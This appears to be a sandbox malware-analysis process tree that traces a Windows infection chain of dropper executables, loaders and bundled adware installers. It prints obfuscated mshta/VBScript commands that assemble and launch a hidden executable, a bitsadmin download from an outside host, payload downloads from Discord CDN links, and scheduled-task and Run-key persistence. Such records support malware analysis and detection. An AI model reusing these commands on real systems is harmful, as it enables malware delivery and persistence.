C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )13⤵PID:2084
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC14⤵PID:7156
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵PID:3764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵PID:200
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵
- Loads dropped DLL
PID:5668
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Hb6h5uEbcZ1THC4k6kC2dsk3.exe"12⤵
- Kills process with taskkill
PID:4900
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"9⤵PID:6468
-
C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe" -u10⤵PID:4676
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe"C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe"9⤵
- Loads dropped DLL
PID:4256 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:6732 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"11⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1416 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffbc68adec0,0x7ffbc68aded0,0x7ffbc68adee012⤵
- Loads dropped DLL
PID:5752
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1984 /prefetch:812⤵PID:1964
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1668 /prefetch:812⤵PID:5496
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1552 /prefetch:212⤵PID:7460
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2588 /prefetch:112⤵
- Checks computer location settings
PID:7396
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2536 /prefetch:112⤵
- Checks computer location settings
PID:208
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3184 /prefetch:212⤵PID:8772
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1576 /prefetch:812⤵PID:9012
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=3616 /prefetch:812⤵PID:2956
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=2168 /prefetch:812⤵PID:5528
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=2396 /prefetch:812⤵PID:9064
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=1012 /prefetch:812⤵PID:6648
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,6383619021400334020,12413416876742051940,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1416_2008182921" --mojo-platform-channel-handle=2096 /prefetch:812⤵PID:8876
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"9⤵PID:3220
-
C:\Users\Admin\AppData\Local\Temp\is-V552B.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp"C:\Users\Admin\AppData\Local\Temp\is-V552B.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp" /SL5="$603CA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4524 -
C:\Users\Admin\AppData\Local\Temp\is-AEATC.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-AEATC.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:1256 -
C:\Program Files\Windows Sidebar\APFVDEXANK\foldershare.exe"C:\Program Files\Windows Sidebar\APFVDEXANK\foldershare.exe" /VERYSILENT12⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:4944
-
-
C:\Users\Admin\AppData\Local\Temp\47-b7244-e17-172a8-3e857febf6646\Lesavaeshiky.exe"C:\Users\Admin\AppData\Local\Temp\47-b7244-e17-172a8-3e857febf6646\Lesavaeshiky.exe"12⤵
- Executes dropped EXE
- Checks computer location settings
PID:4604
-
-
C:\Users\Admin\AppData\Local\Temp\8c-8e61b-387-3d989-f9981205e216a\Dyduhycika.exe"C:\Users\Admin\AppData\Local\Temp\8c-8e61b-387-3d989-f9981205e216a\Dyduhycika.exe"12⤵PID:7736
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x5045juf.0bq\GcleanerEU.exe /eufive & exit13⤵PID:692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4844
-
-
C:\Users\Admin\AppData\Local\Temp\x5045juf.0bq\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\x5045juf.0bq\GcleanerEU.exe /eufive14⤵PID:3060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:6944
-
C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exeC:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exe /qn CAMPAIGN="654"14⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:7880 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\q4ecvgmj.dh1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634167691 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵PID:8680
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe & exit13⤵PID:6236
-
C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exeC:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe14⤵PID:8172
-
C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe"C:\Users\Admin\AppData\Local\Temp\tdf5r4k0.ymw\any.exe" -u15⤵PID:6728
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vggzdfvs.jzt\gcleaner.exe /mixfive & exit13⤵PID:6084
-
C:\Users\Admin\AppData\Local\Temp\vggzdfvs.jzt\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vggzdfvs.jzt\gcleaner.exe /mixfive14⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vntoue02.qvr\autosubplayer.exe /S & exit13⤵PID:1300
-
C:\Users\Admin\AppData\Local\Temp\vntoue02.qvr\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\vntoue02.qvr\autosubplayer.exe /S14⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:1052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:6692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:7948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:3220
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:2576
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:8640
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:2956
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:8940
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
PID:7516
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
PID:5528
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3nRxP8JaB9h67iL -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵PID:3964
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pT0fwB2WYFZFvlVy -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵PID:8928
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:8948
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:6572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:6132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:4444
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:4264
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd15⤵PID:9044
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd16⤵
- Drops file in System32 directory
PID:2724
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:5704
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:3924
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:3804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:6964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu5E86.tmp\tempfile.ps1"15⤵PID:1272
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT15⤵PID:3152
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x13i1rcp.jv3\GcleanerEU.exe /eufive & exit13⤵PID:6740
-
C:\Users\Admin\AppData\Local\Temp\x13i1rcp.jv3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\x13i1rcp.jv3\GcleanerEU.exe /eufive14⤵PID:6836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exeC:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exe /qn CAMPAIGN="654"14⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:5480 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\r3vn5aca.5l4\ EXE_CMD_LINE="/forcecleanup /wintime 1635547516 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵PID:4084
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe & exit13⤵PID:1492
-
C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exeC:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe14⤵PID:7900
-
C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe"C:\Users\Admin\AppData\Local\Temp\xrjtg04e.2hz\any.exe" -u15⤵PID:6536
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vqs0ol1u.0ss\gcleaner.exe /mixfive & exit13⤵PID:6576
-
C:\Users\Admin\AppData\Local\Temp\vqs0ol1u.0ss\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vqs0ol1u.0ss\gcleaner.exe /mixfive14⤵PID:6788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jcteryst.jxt\autosubplayer.exe /S & exit13⤵
- Suspicious use of SetWindowsHookEx
PID:5960
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7356
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8fgV75dLFa3I5kQYP8ZwrC0U.exe"C:\Users\Admin\Pictures\Adobe Films\8fgV75dLFa3I5kQYP8ZwrC0U.exe"7⤵PID:5368
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\demimondaines.vbs"8⤵PID:6328
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\adorning.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\adorning.exe" -pgexttyzmupbgtedvwhlgstporlwudq9⤵PID:7012
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:7040 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"11⤵PID:5912
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\MQEVvxj7hZPEIbDsVozLP91D.exe"C:\Users\Admin\Pictures\Adobe Films\MQEVvxj7hZPEIbDsVozLP91D.exe"7⤵
- Executes dropped EXE
PID:5420 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\8F2E.bat "C:\Users\Admin\Pictures\Adobe Films\MQEVvxj7hZPEIbDsVozLP91D.exe""8⤵PID:6036
-
C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""9⤵PID:6348
-
-
C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""9⤵PID:8072
-
-
C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""9⤵PID:4772
-
-
C:\Users\Admin\AppData\Local\Temp\1169\Transmissibility.exeTransmissibility.exe9⤵PID:6384
-
-
C:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\8F2C.tmp\8F2D.tmp\extd.exe "" "" "" "" "" "" "" "" ""9⤵PID:5012
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ROKEqOhVK1b69uHCUbon1CXS.exe"C:\Users\Admin\Pictures\Adobe Films\ROKEqOhVK1b69uHCUbon1CXS.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5352
-
-
C:\Users\Admin\Pictures\Adobe Films\erU7qk9q9dSAOi8To0x09W6w.exe"C:\Users\Admin\Pictures\Adobe Films\erU7qk9q9dSAOi8To0x09W6w.exe"7⤵PID:5896
-
-
C:\Users\Admin\Pictures\Adobe Films\Zz_Kz0VjFFF_1CMdwOqI2jwN.exe"C:\Users\Admin\Pictures\Adobe Films\Zz_Kz0VjFFF_1CMdwOqI2jwN.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5764
-
-
C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"7⤵PID:5536
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵PID:6944
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\6GLTtvyB0S9ougfOh2CXRyih.exe" ) do taskkill -im "%~NxK" -F9⤵PID:5188
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵PID:1500
-
